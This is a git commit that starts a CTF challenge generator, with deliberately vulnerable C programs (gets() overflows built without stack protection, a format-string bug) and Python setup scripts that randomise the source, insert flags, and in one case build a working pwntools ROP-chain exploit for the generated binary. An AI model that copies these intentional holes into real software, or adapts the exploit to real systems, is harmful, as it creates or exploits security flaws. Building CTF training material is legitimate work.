began to work on the ctf

544257ae · GovanifY · 544257ae · 544257ae · 544257ae · 544257ae
Commit 544257ae authored Apr 19, 2020 by GovanifY
--- a/.gitignore
+++ b/.gitignore
+chals_out/*
+teams.json
--- a/README.md
+++ b/README.md
+CTF Anti cheat
+==========
+How to setup:
+ * put your challengess in chals folder. One folder per chal, each folder must contain
+   a setup.sh 
+
+
+
+challenges done:
+* reverse_rop
+
+TODO:
+* reverse
+* modern_rop
+* simple_rop
+* format_string
+* command_injection
--- a/chals/modern_rop/Makefile
+++ b/chals/modern_rop/Makefile
+all:
+	gcc rop.c -o modern_rop
+	strip modern_rop
--- a/chals/modern_rop/rop.c
+++ b/chals/modern_rop/rop.c
+#include <stdio.h>
+int main(int argc, const char **argv)
+{
+  char s[8];
+ 
+  printf("Enter name : ");
+  fgets(s, 16, stdin);
+  puts("Hello");
+  printf(s, 16);
+  printf("Enter sentence : ");
+  fgets(s, 256, stdin);
+  return 0;
+}
--- a/chals/modern_rop/setup.py
+++ b/chals/modern_rop/setup.py
+import hashlib
+import subprocess
+import os
+
+def rng():
+    BUF_SIZE = 65536 
+    sha2 = hashlib.sha256()
+
+    with open("flag.txt", 'rb') as f:
+        while True:
+            data = f.read(BUF_SIZE)
+            if not data:
+                break
+            sha2.update(data)
+    hash_final=bytes.fromhex(sha2.hexdigest())
+    rng=hash_final[len(hash_final)-1]%256
+    return rng
+
+print("setting up chal")
+print("rng is: %d" % (rng()))
+subprocess.call("make")
+os.remove("rop.c")
+os.remove("Makefile")
+os.remove("setup.py")
--- a/chals/reverse/setup.py
+++ b/chals/reverse/setup.py
+import hashlib
+
+def rng():
+    BUF_SIZE = 65536 
+    sha2 = hashlib.sha256()
+
+    with open("flag.txt", 'rb') as f:
+        while True:
+            data = f.read(BUF_SIZE)
+            if not data:
+                break
+            sha2.update(data)
+    hash_final=bytes.fromhex(sha2.hexdigest())
+    rng=hash_final[len(hash_final)-1]%256
+    return rng
+
+print("setting up chal")
+print("rng is: %d" % (rng()))
--- a/chals/reverse_rop/Makefile
+++ b/chals/reverse_rop/Makefile
+all:
+	gcc -O0 -m32 main.c -no-pie -fno-stack-protector -o reverse_rop 
--- a/chals/reverse_rop/main.c
+++ b/chals/reverse_rop/main.c
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include <stdbool.h>
+#include <stdint.h>
+
+#define BUFSIZE 16
+
+char *test[80];
+
+//--JUNK CODE--
+
+//--JUNK CODE--
+
+void flag1() {
+  strcat(test,"FLAG_PART_1");
+}
+
+void flag2(unsigned int arg_check1) {
+  if (arg_check1 == 0xAABBCCD1) {
+    strcat(test,"FLAG_WRONG");
+  }
+  if (arg_check1 == 0xAABBCCD2) {
+    strcat(test,"FLAG_PART_2");
+  }
+  if (arg_check1 == 0xAABBCCD3) {
+    strcat(test,"FLAG_WRONG");
+  }
+  if (arg_check1 == 0xAABBCCD4) {
+    strcat(test,"FLAG_WRONG");
+  }
+  if (arg_check1 == 0xAABBCCD5) {
+    strcat(test,"FLAG_WRONG");
+  }
+
+}
+
+void flag3(unsigned int arg_check1) {
+  if (arg_check1 == 0xAABBCCD1) {
+    strcat(test,"FLAG_PART_3");
+  }
+  if (arg_check1 == 0xAABBCCD2) {
+    strcat(test,"FLAG_PART_4");
+  }
+  if (arg_check1 == 0xAABBCCD3) {
+    strcat(test,"FLAG_WRONG");
+  }
+  if (arg_check1 == 0xAABBCCD4) {
+    strcat(test,"FLAG_WRONG");
+  }
+  if (arg_check1 == 0xAABBCCD5) {
+    strcat(test,"FLAG_PART_5");
+  }
+
+}
+
+
+void flag6(unsigned int arg_check2, unsigned int arg_check3) {
+  if (arg_check2 == 0xBBCCDDE7) {
+    if(arg_check3==0xBBCCDDE1){
+        strcat(test,"FLAG_WRONG");
+    }
+     if(arg_check3==0xBBCCDDE2){
+        strcat(test,"FLAG_WRONG");
+    }
+     if(arg_check3==0xBBCCDDE3){
+        strcat(test,"FLAG_WRONG");
+    }
+  }
+  if (arg_check2 == 0xBBCCDDE8) {
+    if(arg_check3==0xBBCCDDE1){
+        strcat(test,"FLAG_WRONG");
+    }
+     if(arg_check3==0xBBCCDDE2){
+        strcat(test,"FLAG_WRONG");
+    }
+     if(arg_check3==0xBBCCDDE3){
+        strcat(test,"FLAG_WRONG");
+    }
+  }
+  if (arg_check2 == 0xBBCCDDE9) {
+    if(arg_check3==0xBBCCDDE1){
+        strcat(test,"FLAG_WRONG");
+    }
+     if(arg_check3==0xBBCCDDE2){
+        strcat(test,"FLAG_WRONG");
+    }
+     if(arg_check3==0xBBCCDDE3){
+        strcat(test,"FLAG_PART_6");
+    }
+  }
+  if (arg_check2 == 0xBBCCDDEA) {
+    if(arg_check3==0xBBCCDDE1){
+        strcat(test,"FLAG_WRONG");
+    }
+     if(arg_check3==0xBBCCDDE2){
+        strcat(test,"FLAG_WRONG");
+    }
+     if(arg_check3==0xBBCCDDE3){
+        strcat(test,"FLAG_WRONG");
+    }
+  }
+
+
+
+
+}
+
+void xor(){
+    int i;
+    for (i = 0; i < 80; i++) {
+        if(test[i] == 0x00){
+            return;
+        }
+       test[i] = (unsigned int)test[i] ^ (i%256);
+    }
+}
+
+void xor2(){
+    int i;
+    for (i = 0; i < 80; i++) {
+        if(test[i] == 0x00){
+            return;
+        }
+       test[i] = (unsigned int)test[i] ^ (i%256);
+    }
+}
+
+void xor3(){
+    int i;
+    for (i = 0; i < 80; i++) {
+        if(test[i] == 0x00){
+            return;
+        }
+       test[i] = (unsigned int)test[i] ^ (i%256);
+    }
+}
+
+void vuln() {
+  char buf[16];
+  printf("Vous savez quoi faire :) : ");
+  return gets(buf);
+}
+
+int main(int argc, char **argv){
+
+  setvbuf(stdout, NULL, _IONBF, 0);
+
+  // Set the gid to the effective gid
+  // this prevents /bin/sh from dropping the privileges
+  gid_t gid = getegid();
+  setresgid(gid, gid, gid);
+  vuln();
+}
--- a/chals/reverse_rop/setup.py
+++ b/chals/reverse_rop/setup.py
+import hashlib
+import string
+import random
+import subprocess
+import os
+from pwn import *
+
+
+def rng(index):
+    BUF_SIZE = 65536 
+    sha2 = hashlib.sha256()
+
+    with open("flag.txt", 'rb') as f:
+        while True:
+            data = f.read(BUF_SIZE)
+            if not data:
+                break
+            sha2.update(data)
+    hash_final=bytes.fromhex(sha2.hexdigest())
+    rng=hash_final[index]
+    return rng
+
+def write_line(fd, line, text):
+    fdd = open(fd, "r")
+    buf = fdd.readlines()
+    buf.insert(line, text)
+    
+    fdd = open(fd, "w")
+    fdd.writelines(buf) 
+    fdd.close()
+
+def replace_text(fd, to_change, text):
+    fdd = open(fd, "r")
+    buf = fdd.readlines()
+
+    for i in range(0, len(buf)-1):
+        buf[i]=buf[i].replace(to_change,text)
+
+    fdd = open(fd, "w")
+    fdd.writelines(buf) 
+    fdd.close()
+
+def replace_text_random_hash(fd, to_change):
+    fdd = open(fd, "r")
+    buf = fdd.readlines()
+
+    for i in range(0, len(buf)-1):
+        buf[i]=buf[i].replace(to_change,random_name(size=10, chars="0123456789abcdef"))
+
+    fdd = open(fd, "w")
+    fdd.writelines(buf) 
+    fdd.close()
+
+
+
+# deterministic seed to recreate files in a deterministic fashion
+random.seed(rng(0)+(rng(3)<<1)+(rng(6)<<2)+(rng(8)<<3)+(rng(10)<<4)+(rng(1)<<5)+(rng(2)<<6))
+# to avoid function redefinitions
+def random_name(size=20, chars=string.ascii_uppercase + string.ascii_lowercase):
+   return ''.join(random.choice(chars) for _ in range(size))
+
+# maximum 32 
+junk=["""
+void FUNCTION_NAME (uint32_t v[2], uint32_t k[4]) {
+    uint32_t v0=v[0], v1=v[1], sum=0, i;           /* set up */
+    uint32_t delta=0x9E3779B9;                     /* a key schedule constant */
+    uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3];   /* cache key */
+    for (i=0; i<32; i++) {                         /* basic cycle start */
+        sum += delta;
+        v0 += ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);
+        v1 += ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);
+    }                                              /* end cycle */
+    v[0]=v0; v[1]=v1;
+}
+""",
+"""
+void FUNCTION_NAME (uint32_t v[2], uint32_t k[4]) {
+    uint32_t v0=v[0], v1=v[1], sum=0xC6EF3720, i;  /* set up; sum is 32*delta */
+    uint32_t delta=0x9E3779B9;                     /* a key schedule constant */
+    uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3];   /* cache key */
+    for (i=0; i<32; i++) {                         /* basic cycle start */
+        v1 -= ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);
+        v0 -= ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);
+        sum -= delta;
+    }                                              /* end cycle */
+    v[0]=v0; v[1]=v1;
+}
+""",
+"""
+void *FUNCTION_NAME(void *block, size_t size) {
+  void *new_block = malloc(size);
+  if (new_block == NULL) return NULL;
+  if (block != NULL) memcpy(new_block, block, size); // dirty but sound
+  return new_block;
+}
+""",
+"""
+void * FUNCTION_NAME(size_t size) {
+  void *block = malloc(size);
+  if (block == NULL) {
+    fprintf(stderr, "out of memory in static heap (%zd bytes requested)\n", size);
+    abort();
+  }
+  return block;
+}
+""",
+"""
+unsigned int FUNCTION_NAME() {
+    return (0x33&0xaaaaaaaa)>>1; // -> 0b101010... -> 1+3 aka mask odd numbers
+}
+""",
+"""
+uint16_t FUNCTION_NAME( uint8_t *data, int count )
+{
+   uint16_t sum1 = 0;
+   uint16_t sum2 = 0;
+   int index;
+
+   for ( index = 0; index < count; ++index )
+   {
+      sum1 = (sum1 + data[index]) % 255;
+      sum2 = (sum2 + sum1) % 255;
+   }
+   return (sum2 << 8) | sum1;
+   }
+""",
+"""
+int FUNCTION_NAME(int n)
+{
+    if (n <= 1)
+        return n;
+    return FUNCTION_NAME(n - 1) + FUNCTION_NAME(n - 2);
+}
+""",
+"""
+unsigned int FUNCTION_NAME(unsigned int b) {
+    unsigned int a=b;
+    unsigned int mod=a%b;
+    while(mod>2){
+        a=b;
+        b=mod;
+        mod=a%b;
+    }
+    if(mod==0)
+        return b;
+    return mod;
+}
+"""
+]
+
+
+# junk generator!!
+line_junk=13
+junk_count=rng(0)%len(junk)
+for i in range(0, junk_count+1):
+    junk_to_add=rng(i)%len(junk)
+    # use this 
+    name_call=random_name()
+    write_line("main.c", line_junk, junk[junk_to_add].replace("FUNCTION_NAME",
+        random_name()))
+
+
+# replace flags in source file
+f = open("flag.txt", "r")
+flag=f.readline()
+flag1=flag[:10]
+flag2=flag[10:20]  
+flag3=flag[30:40]  
+flag4=flag[40:50]  
+flag5=flag[50:60]  
+flag6=flag[60:]  
+print(flag6)
+replace_text("main.c", "FLAG_PART_1", flag1)
+replace_text("main.c", "FLAG_PART_2", flag2)
+replace_text("main.c", "FLAG_PART_3", flag3)
+replace_text("main.c", "FLAG_PART_4", flag4)
+replace_text("main.c", "FLAG_PART_5", flag5)
+replace_text("main.c", "FLAG_PART_6", flag6)
+replace_text_random_hash("main.c", "FLAG_WRONG")
+
+
+
+subprocess.call("make")
+
+# we generate the rop
+elf = ELF("reverse_rop")
+rop = ROP(elf)
+FLAG1 = elf.symbols['flag1']
+FLAG2 = elf.symbols['flag2']
+FLAG3 = elf.symbols['flag3']
+FLAG6 = elf.symbols['flag6']
+XOR = elf.symbols['xor']
+XOR2 = elf.symbols['xor2']
+XOR3 = elf.symbols['xor3']
+POP_ONCE = (rop.find_gadget(['pop ebx', 'ret']))[0] 
+
+padding = b'A' * 28
+
+exploit = padding + p32(FLAG1) + p32(FLAG2) + p32(POP_ONCE) + p32(0xAABBCCD2)
+exploit += p32(XOR) + p32(FLAG3) + p32(POP_ONCE) + p32(0xAABBCCD1) + p32(FLAG3) 
+exploit += p32(POP_ONCE) + p32(0xAABBCCD2) + p32(XOR2) + p32(FLAG3) +p32(POP_ONCE) 
+exploit += p32(0xAABBCCD5) + p32(XOR3) + p32(FLAG6) + p32(POP_ONCE) + p32(0xBBCCDDE9) + p32(0xBBCCDDE3)
+
+f = open("input", "wb")
+f.write(exploit)
+f.close()
+
+subprocess.call(["strip", "reverse_rop"])
+
+
+os.remove("main.c")
+os.remove("Makefile")
+os.remove("setup.py")
+os.remove("flag.txt")
+
--- a/chals/simple_rop/Makefile
+++ b/chals/simple_rop/Makefile
+all:
+	gcc -O0 rop.c -no-pie -fno-stack-protector -o simple_rop
+	strip simple_rop
--- a/chals/simple_rop/rop.c
+++ b/chals/simple_rop/rop.c
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include <stdbool.h>
+#include <stdint.h>
+
+#define BUFSIZE 16
+
+bool win1 = false;
+bool win2 = false;
+//--JUNK CODE--
+
+//--JUNK CODE--
+void win_function1() {
+  win1 = true;
+}
+
+void win_function2(unsigned int arg_check1) {
+  if (win1 && arg_check1 == 0xBAAAAAAD) {
+    win2 = true;
+  }
+  else if (win1) {
+    printf("Wrong Argument. Try Again.\n");
+  }
+  else {
+    printf("Nope. Try a little bit harder.\n");
+  }
+}
+
+void flag(unsigned int arg_check2) {
+  char flag[48];
+  FILE *file;
+  file = fopen("flag.txt", "r");
+  if (file == NULL) {
+    printf("Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\n");
+    exit(0);
+  }
+
+  fgets(flag, sizeof(flag), file);
+  
+  if (win1 && win2 && arg_check2 == 0xDEADBAAD) {
+    printf("%s", flag);
+    return;
+  }
+  else if (win1 && win2) {
+    printf("Incorrect Argument. Remember, you can call other functions in between each win function!\n");
+  }
+  else if (win1 || win2) {
+    printf("Nice Try! You're Getting There!\n");
+  }
+  else {
+    printf("You won't get the flag that easy..\n");
+  }
+}
+
+void vuln() {
+  char buf[16];
+  printf("Enter your input> ");
+  return gets(buf);
+}
+
+int main(int argc, char **argv){
+
+  setvbuf(stdout, NULL, _IONBF, 0);
+  
+  // Set the gid to the effective gid
+  // this prevents /bin/sh from dropping the privileges
+  gid_t gid = getegid();
+  setresgid(gid, gid, gid);
+  vuln();
+}
--- a/chals/simple_rop/setup.py
+++ b/chals/simple_rop/setup.py
+import hashlib
+import string
+import random
+import subprocess
+import os
+
+
+def rng(index):
+    BUF_SIZE = 65536 
+    sha2 = hashlib.sha256()
+
+    with open("flag.txt", 'rb') as f:
+        while True:
+            data = f.read(BUF_SIZE)
+            if not data:
+                break
+            sha2.update(data)
+    hash_final=bytes.fromhex(sha2.hexdigest())
+    rng=hash_final[index]
+    return rng
+
+def write_line(fd, line, text):
+    fdd = open(fd, "r")
+    buf = fdd.readlines()
+    buf.insert(line, text)
+    
+    fdd = open(fd, "w")
+    fdd.writelines(buf) 
+    fdd.close()
+
+# deterministic seed to recreate files in a deterministic fashion
+random.seed(rng(0)+(rng(3)<<1)+(rng(6)<<2)+(rng(8)<<3)+(rng(10)<<4)+(rng(1)<<5)+(rng(2)<<6))
+# to avoid function redefinitions
+def random_name(size=20, chars=string.ascii_uppercase + string.ascii_lowercase):
+   return ''.join(random.choice(chars) for _ in range(size))
+
+# maximum 32 
+junk=["""
+void FUNCTION_NAME (uint32_t v[2], uint32_t k[4]) {
+    uint32_t v0=v[0], v1=v[1], sum=0, i;           /* set up */
+    uint32_t delta=0x9E3779B9;                     /* a key schedule constant */
+    uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3];   /* cache key */
+    for (i=0; i<32; i++) {                         /* basic cycle start */
+        sum += delta;
+        v0 += ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);
+        v1 += ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);
+    }                                              /* end cycle */
+    v[0]=v0; v[1]=v1;
+}
+""",
+"""
+void FUNCTION_NAME (uint32_t v[2], uint32_t k[4]) {
+    uint32_t v0=v[0], v1=v[1], sum=0xC6EF3720, i;  /* set up; sum is 32*delta */
+    uint32_t delta=0x9E3779B9;                     /* a key schedule constant */
+    uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3];   /* cache key */
+    for (i=0; i<32; i++) {                         /* basic cycle start */
+        v1 -= ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);
+        v0 -= ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);
+        sum -= delta;
+    }                                              /* end cycle */
+    v[0]=v0; v[1]=v1;
+}
+""",
+"""
+void *FUNCTION_NAME(void *block, size_t size) {
+  void *new_block = malloc(size);
+  if (new_block == NULL) return NULL;
+  if (block != NULL) memcpy(new_block, block, size); // dirty but sound
+  return new_block;
+}
+""",
+"""
+void * FUNCTION_NAME(size_t size) {
+  void *block = malloc(size);
+  if (block == NULL) {
+    fprintf(stderr, "out of memory in static heap (%zd bytes requested)\n", size);
+    abort();
+  }